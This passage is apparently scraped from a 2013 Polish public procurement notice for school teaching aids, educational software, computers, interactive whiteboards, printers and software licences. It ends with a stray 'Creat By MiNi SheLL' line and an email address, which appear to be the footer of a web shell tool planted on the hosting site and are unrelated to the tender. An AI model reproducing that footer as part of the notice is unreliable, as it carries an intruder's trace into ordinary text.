5. Przestrzenna trójwymiarowa stojąca drewniana konstrukcja  składająca się z co najmniej czterech  ścian zawierających różnorodne złożone labirynty do ćwiczeń usprawniających motorykę palców i dłoni. Każda ścianka wyposażona jest w różnego rodzaju pomoce. Przestrzenna konstrukcja pozwala na zabawę jednocześnie min. 4 dzieci, o wymiarach min. 1,20 x 1,20 x 0,8 m szt. 1
6. Przestrzenna trójwymiarowa stojąca drewniana konstrukcja  składająca się z co najmniej trzech  ścian, z których każda  zawiera inny labirynt do ćwiczeń usprawniających motorykę i sprawność manualną dłoni oraz rozwija koordynację wzrokowo - ruchową. 
Przestrzenna konstrukcja pozwala na zabawę jednocześnie min. 3 dzieci. 
Wymiary jednej ścianki co najmniej 70 x 100 cm szt. 1
7. Gra ucząca rozpoznawania głosów zwierząt. Powinna być wyposażona co najmniej w płytę CD  z nagraniem, min. 6 kart ze zdjęciami i żetony. Dziecko powinno mieć możliwość zidentyfikowania poprzez grę co najmniej 30 odgłosów zwierząt szt. 1
8. Gra ucząca koncentracji uwagi, identyfikowania i różnicowania dźwięków. Dziecko dzięki grze powinno zdobyć umiejętność rozpoznawania dźwięków. Pomoc dydaktyczna powinna zawierać co najmniej płytę CD z nagraniem min. 20 dźwięków, min. 20 dwustronnych kart oraz min. 100 żetonów. szt. 1
9. Gra polega na rozpoznawaniu dźwięków i kojarzeniu ich z obrazem. Ćwiczy koncentrację, kojarzenie i pamięć słuchową, wzbogaca słownictwo. Gra powinna zawierać min. 30 ścieżek dźwiękowych na płycie CD, żetony, min. 20 kart, ilustrowanych dwustronnie, przedstawiających różne zwierzęta, naturę itp. szt. 1

10. Pakiet obejmujący cały materiał nauczania matematyki, który w pełni odpowiada podstawie programowej w szkole podstawowej w klasach 1-6. Pozwala na konkretnych zjawiskach i codziennych sytuacjach pokazać istotę działań matematycznych, uczy logicznego myślenia, szacowania, szybkiego liczenia, ćwiczy matematykę praktyczną. kpl. 1
11. Pakiet do terapii pedagogicznej z przedmiotu matematyka. Wspomagający diagnozę i terapię zaburzeń w szkole podstawowej, pomaga w nauczaniu matematyki. Pakiet powinien składać się z ćwiczeń wprowadzających i utrwalających wiedzę, zadań o różnym stopniu trudności, gier, testów, co najmniej kilku części o zróżnicowanym stopniu trudności. Pakiet powinien obejmować co najmniej następujący zakres tematyczny: Działania na liczbach do 1000, Działania na liczbach wielocyfrowych, ułamki, procenty. kpl. 1
12. Multimedialna edukacyjna gra matematyczna, która poprzez zabawę powinna rozwijać i uczyć dziecko matematyki. Program powinien składać się z co najmniej 100 interaktywnych ćwiczeń matematycznych, zabaw na spostrzegawczość, różnych poziomów trudności, przyjemnych i ciekawych dla dziecka animacji, ilustracji i narracji z minimum takich zakresów tematycznych jak dodawanie i odejmowania do maksymalnie 30, porównywanie liczb, zbiory, liczby jedno i dwucyfrowe, ciągi liczbowe, liczy naturalne szt. 18
13. Multimedialna edukacyjna gra matematyczna, która poprzez zabawę powinna rozwijać i uczyć dziecko matematyki. Program powinien składać się z co najmniej 100 interaktywnych ćwiczeń matematycznych, zabaw na spostrzegawczość, różnych poziomów trudności, przyjemnych i ciekawych dla dziecka animacji, ilustracji i narracji z minimum takich zakresów tematycznych jak dodawanie i odejmowania do maksymalnie 100, porządkowanie liczb, liczby na osi, mnożenie liczb do maksymalnie 30, pole powierzchni. Program powinien również dawać możliwość rejestrowania zdobytych przez dzieci wyników. szt. 18
14. Multimedialna edukacyjna gra matematyczna, która poprzez zabawę powinna rozwijać i uczyć dziecko matematyki. Przeznaczona dla klas I-III szkoły podstawowej. Program powinien składać się z co najmniej 100 interaktywnych ćwiczeń matematycznych, zabaw na spostrzegawczość, różnych poziomów trudności, przyjemnych i ciekawych dla dziecka animacji, ilustracji i narracji z minimum takich zakresów tematycznych jak min. dodawanie i odejmowanie liczb do 1000; mnożenie i dzielenie liczb do 100; zadania z niewiadomą; działania na liczbach; figury; określanie dat; długości. szt. 18
15. Multimedialna edukacyjna gra matematyczna, która poprzez zabawę powinna rozwijać i uczyć dziecko matematyki. Przeznaczona dla klas I-III szkoły podstawowej. Program powinien składać się z co najmniej 100 interaktywnych ćwiczeń matematycznych, zabaw na spostrzegawczość, różnych poziomów trudności, przyjemnych i ciekawych dla dziecka animacji, ilustracji i narracji z minimum takich zakresów tematycznych jak min. 
- dodawanie, odejmowanie, mnożenie i dzielenie liczb do 10 000; grafy; działania arytmetyczne; algorytmy; działania na ułamkach; waluty, pojemności; figury przestrzenne; bryły. szt. 18
16. Gra dydaktyczna rozwijająca i doskonaląca sprawność manualną, celność ruchów, koordynację wzrokowo-ruchową, koncentrację uwagi, współdziałanie w grupie poprzez dopasowywanie elementów do planszy przez gracza. Gra powinna zawierać co najmniej planszę o średnicy min. 40 cm, która jest podzielona na kolorowe strefy. szt. 1
17. Pakiet zawiera zestaw pomocy dydaktycznych, co najmniej gier, układanek, opowiadań, wierszyków, piosenek, który pomaga nauczycielom organizowania ciekawych i wartościowych zajęć uczących dziecko funkcjonowania w grupie, nawiązywania relacji z innymi ludźmi, przybliżyć dziecku normy i zasady funkcjonowania w grupie, radzenia sobie z lękiem. kpl. 1
18. Pakiet materiałów dydaktycznych do prowadzenia zajęć logopedycznych, zawierający min. słuchowiska logopedyczne, zbiór obrazków i plakatów wspomagających badanie mowy, szereg materiałów do ćwiczenia fazy wydechowej, gry logopedyczne, materiały wyrazowo - obrazkowe do utrwalania poprawnej wymowy głosek, bajeczki logopedyczne, wierszyki logopedyczne. Pakiet programów powinien być przeznaczony dla dzieci w wieku szkolnym i zawierać następujące minimum tematyczne: szereg ciszący, syczący i szumiący, głoska r, mowa bezdźwięczna.
kpl. 1

19. Program multimedialny wykorzystujący muzykę w profilaktyce i terapii logopedycznej, zawierający zestaw ćwiczeń kształtujących umiejętności językowo - słuchowo - ruchowe dziecka.
kpl. 1
20. Pakiet materiałów dydaktycznych przeznaczonych dla dzieci z różnymi typami niepełnosprawności, zawiera co najmniej dotykowe kształty, domina, loteryjki, zgadywanki, pozwalający dostosować treści nauczania i metody do możliwości psychofizycznych dziecka. kpl.1
21. Pakiet pomocy przeznaczony do pracy z uczniem szkoły podstawowej o wyjątkowych zdolnościach, który pozwoli na rozwój zainteresowań matematyczno-przyrodniczych, zawierający co najmniej gry dydaktyczne, karty, układanki, domino, rozwijające umiejętności matematyczne i wiedzę o przyrodzie oraz elementy umożliwiające przeprowadzanie eksperymentów.   kpl.1
22. Pakiet składający się z co najmniej 3 interaktywnych gier edukacyjnych umożliwiających dzieciom z klas I-III szkoły podstawowej zdobycie wiedzy o zjawiskach i prawach przyrody. Uczeń może również przeprowadzać eksperymenty naukowe. Dzięki grze dziecko powinno przeżyć ciekawą przygodę i zdobyć wiedzę min. z zagadnienia pogoda i ziemia. kpl. 18
23. Multimedialny program do nauki języka angielskiego, przeznaczony dla klas I - III oraz IV - VI wyposażony w co najmniej różnorodne ćwiczenia, gry z bogatą grafiką oraz atrakcyjną fabułą. 
Program powinien być dostosowany do podstawy programowej, w wersji sieciowej - licencja na min. 18 stanowisk.  kpl. 18 
24. Plansze interaktywne dla szkoły podstawowej z przedmiotu język polski. Program powinien składać się z min. kilkudziesięciu plansz interaktywnych zawierających treści edukacyjne zgodne z podstawą programową do nauczania języka polskiego w szkole podstawowej klasy 4-6. Materiały powinny zawierać min. tematyczne dotyczące języka, słowotwórstwa, leksyki, literatury, teatru, fonetyki i  ortografii.szt.1
25. Plansze interaktywne dla szkoły podstawowej z przedmiotu matematyka. Program powinien składać się z min. kilkudziesięciu plansz interaktywnych zawierających treści edukacyjne zgodne z podstawą programową do nauczania matematyki w szkole podstawowej klasy 4-6. Materiały powinny zawierać następujące minimum tematyczne: liczby naturalne i całkowite, ułamki, procenty, figury, bryły.szt.1
26. Plansze interaktywne dla szkoły podstawowej z przedmiotu przyroda. Program powinien składać się z min. kilkudziesięciu plansz interaktywnych zawierających treści edukacyjne zgodne z podstawą programową do nauczania przyrody w szkole podstawowej. Materiały powinny zawierać min. następujące tematy: rośliny, zwierzęta, człowiek,  mapa, odkrywcy, piętra roślinności, światło.
szt. 1
27. Plansze interaktywne dla szkoły podstawowej z przedmiotu historia. Program powinien składać się z min. kilkudziesięciu plansz interaktywnych zawierających treści edukacyjne zgodne z podstawą programową do nauczania historii w szkole podstawowej. Materiały powinny zawierać min. tematyczne: podwaliny kontynentu europejskiego, państwo polskie, Rzeczpospolita Obojga Narodów, walka o niepodległość. szt.1
28.Plansze interaktywne dla szkoły podstawowej z przedmiotu języka angielskiego. Program powinien składać się z min. kilkudziesięciu plansz interaktywnych zawierających treści edukacyjne zgodne z podstawą programową do nauczania języka angielskiego w szkole podstawowej. Materiały powinny zawierać słownictwo z minimum następujących działów tematycznych: wygląd ludzi, ubiór,  miejsca i kultura krajów anglojęzycznych. szt.1
29. Plansze interaktywne dla szkoły podstawowej klasy I-III. Program powinien składać się z min. kilkudziesięciu plansz interaktywnych zawierających treści edukacyjne zgodne z podstawą programową do nauczania w klasach I-III w szkole podstawowej. Plansze powinny przedstawiać następujące min. tematyczne:   nauka litery, odejmowanie, zasady bezpieczeństwa i znaki drogowe, oś liczbowa, informacje o Polsce, zasady ortograficzne, sylab, alfabet, kształty i kolory, owoce i warzywa, układ słoneczny i planety, przymiotniki, kolory itp. szt. 1
30. Program multimedialny do pokonywania trudności w  czytaniu dla dzieci klas I-III szkoły podstawowej. Program powinien służyć pomocą na zajęciach kompensacyjno-wyrównawczych dla dzieci dyslektycznych w klasach 1-3. Program powinien uczyć poprzez animowane prezentacje liter, zawierać min. 80 zabaw, krzyżówek, zagadek, rebusów, łamigłówek; min. 100 układanek typu puzzle połączonych z odczytywaniem nazw układanych przedmiotów z podziałem na sylaby i głoski. szt. 18
31. Program multimedialny do nauki liczenia dla dzieci klas I-III szkoły podstawowej. 
Nauka liczenia opiera się poprzez zabawę w połączeniu poznania matematyki i przyrody np. w domu, lesie czy mieście.  szt. 18
32. Program multimedialny do nauki ortografii poprzez zabawę  dla dzieci klas I-III szkoły podstawowej. 
Program powinien zawierać min. 80 komputerowych zabaw z ortografią, w formie ćwiczeń, które przyswoją i nauczą ortografii.  szt. 18
33. Program multimedialny do nauki zasad ruchu drogowego, dla dzieci klas I-III szkoły podstawowej. Poprzez zabawę z programem dziecko powinno zdobyć umiejętność bezpiecznego zachowania się na drodze. Program powinien zawierać minimum 80 gier i zabaw, które m.in. kreują spostrzegawczość, umożliwiają analizowanie sytuacji na drodze i uczą orientacji w terenie. szt. 18
34. Program multimedialny, który wprowadza dziecko w świat muzyki. Program przeznaczony dla klas I-III szkoły podstawowej. Nauka powinna opierać się na zabawach muzycznych, popularnych piosenkach, które cechują się prostotą, łatwą linią melodyczną i przyswajalnym rytem, dzięki czemu uczniowie zdobędą możliwość m.in. nauki śpiewu oraz gry na instrumentach klawiszowych.
szt. 18.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa nowoczesnego sprzętu, zestawów komputerowych, oprogramowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup nowoczesnego sprzętu
1. Wizualizer - z przystawką do mikroskopu szt. 1
Sensor (przetwornik) - CMOS
Ilość pikseli (efektywna) - 5000000
Rozdzielczość (efektywna) - Full HD 1080p (1920 x 1080)
Częstotliwość odświeżania - 30 FPS
Zoom optyczny - 8
Obszar skanowania - 400 x 300 mm
Fokus - Automatyczny/ręczny
Typ głowicy - Gęsia szyja
Wbudowana pamięć - 80 zdjęć
Zapis na karcie pamięci (typ) - karta SDHC
port USB - np. pendrive
Pilot zdalnego sterowania - Tak
Oświetlenie zewnętrzne  - 1x
Typ oświetlenia - LED
Wyjścia video - Composite (RCA), DVI-I, VGA (D-Sub15)
Wejścia video - VGA (D-Sub15)
Wyjścia audio - Mikofon (mini jack 3.5 mm), Mini jack 3.5 mm
Wejścia audio - Mini jack 3.5 mm
Porty komunikacyjne - RS232, USB (b)
Waga - 2.6 kg
Wymiary max. - 200 x 540 x 380 mm
Wymiary min. - 245 x 77 x 305 mm
Zasilacz - Zewnętrzny
Akcesoria w zestawie - przystawka do mikroskopu, instrukcja obsługi, kabel zasilający, oprogramowanie, pilot, przewód USB,
zasilacz
Gwarancja - 5 lat
Funkcje - Automatyczna regulacja przesłony, Automatyczny balans bieli, AVerZoom 1.25x, Dzielenie ekranu (PBP),
Kensington Lock, Nanoszenie notatek bez komputera,
Negatyw/Pozytyw, Obracanie obrazu, Pokaz slajdów,
Stop klatka, Tryb Foto/Tekst, Wbudowany mikrofon,
Zabezpieczenie hasłem
2.Tablica interaktywna z projektorem multimedialnym i laptopem szt. 3
Tablica interaktywna wraz z montażem
1. Technologia - Elektromagnetyczna pasywna
2. Przekątna robocza obrazu -79 cali
3. Powierzchnia tablicy przystosowana  do projekcji, do pisania pisakami suchościeralnymi oraz odporna na uszkodzenia mechaniczne.
4. Dołączone oprogramowanie producenta tablicy w języku polskim.
5. Zasilanie z USB - możliwe.
6. Wymagana możliwość pracy w Trybie Multi User -  jednoczesną pracę kilku użytkowników na wspólnym lub podzielonym obszarze tablicy minimum 9 użytkowników.
7. Wymagany Tryb interaktywny-pełna obsługę komputera, praca na dowolnych programach i nanoszenie na nich różnego rodzaju adnotacji . Wymagany  Tryb Office - współpraca z programami pakietu Microsoft Office, gdzie adnotacje stają się bezpośrednio obiektami aplikacji Office. Wymagany Tryb PC Whiteboard - współpraca tablicy i komputera bez użycia projektora.
8. Komunikacja z komputerem - Minimum przez USB
9. Wymagane akcesoria w zestawie:
- 2 pisaki interaktywne wyposażone w akumulatorki i ładowarka,
- kabel USB min 5 m
- dołączony z tablicą zestaw pozwalający na zamocowanie tablicy na ścianie
- zasilacz uniwersalny
- oprogramowanie do tablicy oraz program do tworzenia własnych ćwiczeń w języku polskim
Gwarancja Minimum 36 miesięcy - elektronika, powierzchnia
oraz minimum  12 miesięcy na akcesoria.
Projektor wraz z montażem
Projektor krótkoogniskowy z uchwytem ściennym
Rozdzielczość rzeczywista: 1024 x 768 (XGA) pikseli
Typ matrycy LCD: LCD 3 x 0,63 cali
Ilość pikseli: 2359296 pikseli
Rzeczywisty współczynnik proporcji obrazu: 4:3
Zoom: Optyczny (manualny)
Współczynnik powiększenia (optyczny): 1,05 : 1
Korekcja zniekształceń trapezowych (Keystone): ? 5 (w pionie) stopni
Cyfrowa korekcja Keystona: Tak
Źródło światła: lampa rtęciowa (standardowa)
Moc lampy: 210 Wat
Żywotność lampy (tryb normalny): 3000 godz.  4500 godz.
Żywotność lampy (tryb cichy): 6000 godz.
Jasność (tryb normalny): 3000 ANSI lumen, 2400 ANSI lumen
Jasność (tryb cichy): 2000 ANSI lumen
Kontrast (tryb normalny): 2500:1
Poziom hałasu (tryb normalny): 35 dB, 32 dB
Poziom hałasu (tryb cichy): 28 dB
Wielkość obrazu:  153-280 cm
Stosunek projekcji:  80cal przy 0,56-0,58 m
Złącza (wejścia): 2 x D-sub 15-pin, 2 x stereo mini Jack,
1 x RCA Video, 2 x RCA (audio LR), 1 x Mini DIN 4-pin (S-Video), 1 x RS-232, 1 x RJ45
Złącza (wyjścia): 1 x D-sub 15-pin, 1 x wyjście słuchawkowe
Pilot w zestawie: Tak
Gwarancja - Minimum 24 miesiące na projektor
Głośniki wraz z montażem
Ilość głośników: 2
Głośniki satelitarne: 2
Głośnik centraln: nie
Subwoofer: nie
Moc głośników RMS [W] 50
Zakres częstotliwości - dolna [Hz] 20
Zakres częstotliwości - górna [kHz] 20
Regulacja głośności
Regulacja tonów niskich
Regulacja tonów wysokich
Gwarancja min. - 24 miesięcy
Laptop
Zastosowanie: Komputer będzie wykorzystywany dla potrzeb aplikacji biurowych, aplikacji edukacyjnych, aplikacji graficznych, dostępu do Internetu oraz poczty elektronicznej
Przekątna ekranu 15,6 cala rozdzielczość minimum 1920x1080
 Procesor o wydajności pozwalającej na osiągnięcie wartości
Passmark CPU Mark min. 6882 pkt. w testach CPU
przeprowadzonych przez niezależną firmę PassMark Software
na stronie http://www.cpubenchmark.net/cpu_list.php
 w dniu ogłoszenia postępowania.
Pamięć RAM minimum 6GB
Porty i wyposażenie, minimalne wymagania
1x 15-stykowe D-Sub (wyjście na monitor), 1 x HDMI, USB 3.0, 1x10/100/1000BaseT Gigabitethernet (RJ45), Wyjście słuchawkowe, wejście na mikrofon, wejście zasilania (DC-in), Zintegrowana kamera, Głośniki stereo, Mikrofon , Czytnik kart pamięci, 1 x Express Card 34, Touchpad
Dysk Twardy minimum   500 GB 
Napędy  DVD?RW Super Multi (+ DVD-RAM) Dual Layer
Karta dźwiękowa - Zintegrowana
Karta graficzna minimalne wymagania - Komputer powinien osiągnąć w teście wydajności Passmark G3D Rating
min. 839 pkt. w testach CPU przeprowadzonych przez
niezależną firmę PassMark Software na stronie
http://www.videocardbenchmark.net/gpu_list.php
w dniu ogłoszenia postępowania.
Karty sieciowe - 1x10/100/1000BaseT Gigabitethernet (RJ45) , wifi IEEE 802.11b/g/n
System operacyjny i oprogramowanie. System operacyjny Microsoft Windows 7 Pro PL 64-bit. Dołączone oryginalne nośniki umożliwiające szybkie przywrócenie systemu operacyjnego.
Płyta ze sterownikami
Gwarancja - minimum 36 miesięcy, realizowana w miejscu instalacji sprzętu najpóźniej następnego dnia roboczego po zgłoszeniu
Zakup zestawów komputerowych
3. Zestawy komputerowe: monitor, komputer, myszka, klawiatura szt. 23
Zastosowanie: Komputer będzie wykorzystywany dla potrzeb aplikacji biurowych, aplikacji edukacyjnych, aplikacji graficznych, dostępu do Internetu oraz poczty elektronicznej
Przekątna ekranu LCD/LED 23 cala , rozdzielczość minimum 1920x1080 Wbudowane głośniki: Tak, złącza D-Sub, DVI-D
Mysz złącze USB, Klawiatura złącze USB
Obudowa: Przystosowana do pracy w pionie i poziomie. Otwierana boczna ściana obudowy umożliwiająca dostęp do wszystkich podzespołów komputera
 Procesor o wydajności pozwalającej na osiągnięcie wartości
Passmark CPU Mark min. 6585  pkt. w testach CPU
przeprowadzonych przez niezależną firmę PassMark Software
na stronie http://www.cpubenchmark.net/cpu_list.php
 w dniu ogłoszenia postępowania.
Pamięć RAM minimum 4GB, 2 wolne sloty dla rozszerzenia pamięci
Porty i wyposażenie, minimalne wymagania
- 1xPCI Expres
- 1x 15-stykowe D-Sub (wyjście na monitor),
- 1 x HDMI,  
- 1x10/100/1000BaseT Gigabitethernet (RJ45), 
- 1x DisplayPort 
- 1x gniazdo mikrofonowe (panel przedni) 
- 1x gniazdo słuchawkowe (panel przedni) 
- 1x złącze RJ-45 
- 3x złącze audio 
- 4x USB 3.0
- 2x złącze USB (przedni panel)
Dysk Twardy minimum   500 GB 
Napędy  DVD?RW 
Karta dźwiękowa - Zintegrowana
Karta graficzna - zintegrowana
Karty sieciowe - 1x10/100/1000BaseT Gigabitethernet (RJ45)
System operacyjny i oprogramowanie - Licencja na system operacyjny Microsoft Windows 8 Professional PL 64-bit z prawem do korzystania z wersji wcześniejszej systemu.
Fabrycznie preinstalowany przez producenta oferowanego komputera system operacyjny Microsoft Windows 7 Pro PL 64-bit lub
Dołączone oryginalne nośniki umożliwiające szybkie przywrócenie systemu operacyjnego Windows 8 Pro PL 64-bit.
Płyta ze sterownikami
Gwarancja - minimum 36 miesięcy, realizowana w miejscu instalacji sprzętu najpóźniej następnego dnia roboczego po zgłoszeniu
Zakup oprogramowania
4.Oprogramowanie: Pakiet OFFICE szt. 26
Oprogramowanie biurowe - Microsoft Office 2013 PL Professional Plus (licencja i płyta umożliwiająca instalację) licencje na szkołę 

5.Program antywirusowy szt. 26
Licencja min. 3 lata
Skaner antywirusowy, Antyspyware, zintegrowane narzędzia ułatwiające diagnostykę systemu i jego ewentualnego przywracanie w przypadku uszkodzenia plików, System zapobiegania włamaniom,

Dopuszcza się zakup 1 grupowej licencji w programach do szkolnej pracowni: jeden pakiet ochrony maksymalnie 100 stacji roboczych 

6. Program zabezpieczający Internet szt. 26
Blokowanie dostęp do niecenzuralnych treści internetowych oraz wybranych czatów i komunikatorów. Automatyczne blokowanie stron z pornografią i przemocą oraz narkomanią
Zakup sprzętu
7.Drukarka atramentowa - urządzenie wielofunkcyjne szt. 1
Technologia - Atramentowa
Kolorowy ekran LCD - 4,9 cm dotykowy z klawiszami dotykowymi
Podajnik papieru - 100 stron
Formaty papieru - A4 / A5 / A6 / EXE / LTR / LGL / JISB5 / Photo 10 x 15cm, 89 x 127mm, 127 x 178mm / Postcard 100 x 148mm, 148 x 200mm / Index card 127 x 203mm / C5 Envelopes / COM 10 / DL / JE4 Envelope 
Gramatury papieru - 64 - 220 g/m2
Interfejs standardowy USB 2.0 - Hi-Speed USB 2.0, 802.11b wireless  - Tak
Pamięć (RAM)  - Standardowa 40 MB
Prędkość druku  Mono 33, Kolor 26
Rozdzielczość druku  -  WindowsR 6,000 x 1,200
Prędkość kopiowania  -  Do 22 str./min Mono 20 str./min Kolor
Rozdzielczość kopiowania Skan  - Do 1 200 x 1 200 dpi
Zmniejszanie/Powiększanie kopii  - Od 25% do 400% co 1%
Kopiowanie wielokrotne - Do 99
Rozdzielczość skanowania Optyczna - Do 1200 x 2400 dpi, Interpolowana - Do 19200x19200 dpi
Możliwość skanowania do Obrazu  - tak, E-maila - tak, Pliku - tak
Pobór mocy Druk - 18 W, Stan gotowości - 5 W, Uśpienie - 1,2 W
Poziom hałasu - Drukowanie - 50 dB (A)
Waga -  8.7 Kg
Wymiary (w x d x h) -  405 x 378 x 160 mm
ATRAMENTY: Kartridż z czarnym atramentem; Kartridż z błękitnym atramentem; Kartridż z purpurowym atramentem; Kartridż z żółtym atramentem (wydajność każdego 600 str.)
8.Drukarka laserowa - urządzenie wielofunkcyjne szt.1
DRUKARKA: Rozdzielczość wydruku (dpi )600 x 600, Pamięć (MB)192, Funkcja drukowania tak, Prędkość drukowanych stron w kolorze na minutę20, Pojemność popieru50, Czas wydruku pierwszej strony (z trybu gotowości) : Czerń: W ciągu zaledwie 17 s, Kolor: W ciągu zaledwie 17 s, Prędkość drukowanych stron czarno-białych na minutę20, Technologia wydruku laser, Duplex automatycznie, Wydruk w kolorze tak
Kopiarka Funkcja kopiowania tak, Zoom tak, Rozdzielczość kopii (dpi )300 x 300, Ilość kopii w kolorze na minutę 20, Ilość czarno-białych kopii na minutę 20
SKANER Funkcja skanowania tak, Rozdzielczość skanowania (dpi )1200
Wartość energii: Poziom hałasu (dB )51, Pobór mocy w czasie pracy (W)465
Dane techniczne Maksymalny rozmiar papieruA4
Komunikacja: WLAN tak, Interfejs sieciowy Ethernet tak, Złącze USB tak
Faksowanie: Maksymalna prędkość modemu (bit /s)33600, Rozdzielczość faksu (dpi )300 x 300, Ponowne wybieranie numeru tak, Funkcja faksu tak
Panel sterowania: Intuicyjny, kolorowy ekran dotykowy CGD
9. Mini wieża  szt. 5
System stereo z głośnikami o mocy RMS 2 x 20W, obsługuje płyty CD-R i CD-RW oraz pliki MP3. Posiada tuner FM z funkcją RDS i pamięcią na 30 stacji. Wyposażona jest w port USB, wyjście słuchawkowe oraz wyświetlacz fluorescencyjny. CD, CD-R/ -RW*1 CD-DA - tak,  MP3*2 - tak
Audio System Konfiguracja2 kanały , Moc wyjściowa (RMS), Przód, 20W 
 USB Złącze - tak , Odtwarzanie MP3*2 - tak 

Dźwięk HQ Podłączenie cyfrowe dla iPodR/ iPhoneR - tak , Pure Direct Sound System - tak , Direct-Vocal Surround - tak,   Surround, Głośniki z membranami z bambus  - tak , Aero Stream Port, Podwójne pasywne membrany - tak , System dźwięku D.Bass - tak,  Zaprogramowane ustawienia korektora 4 (Heavy, Clear, Soft, Vocal) + Flat , Regulacja tonów niskich i wysokich - tak 
Łatwy w użyciu Otwierana automatycznie pokrywa tak (dla iPod/iPhone oraz CD), Możliwość zawieszenia na ścianie - tak , Wyświetlacz, Fruorescencyjny 
Łączność Obsługa radia internetowego tak  Podłaczenie iPod/ iPhone tak (Atomatycznie wysuwana stacja dokujaca) ,Technologia bezprzewodowa BluetoothR
Przód Konfiguracja 1 drożny 1 głośnikowy, Podwójna pasywna membrana 
Złącza Analogowe wejście audio 3.5mm, Wyjście słuchawkowe tak 
Tuner Pamięć Programów/Stacji 30 FM  Automatyczne strojenie tak,  RDS tak 
Pozostałe Zasilanie AC 220-240V, 50Hz  Auto Wył. zasilania/ Przyciemniania tak /tak , Timer PLAY/SLEEP.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.11.00-8, 30.23.12.50-4, 30.23.32.31-9, 30.21.32.00-7, 30.23.20.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com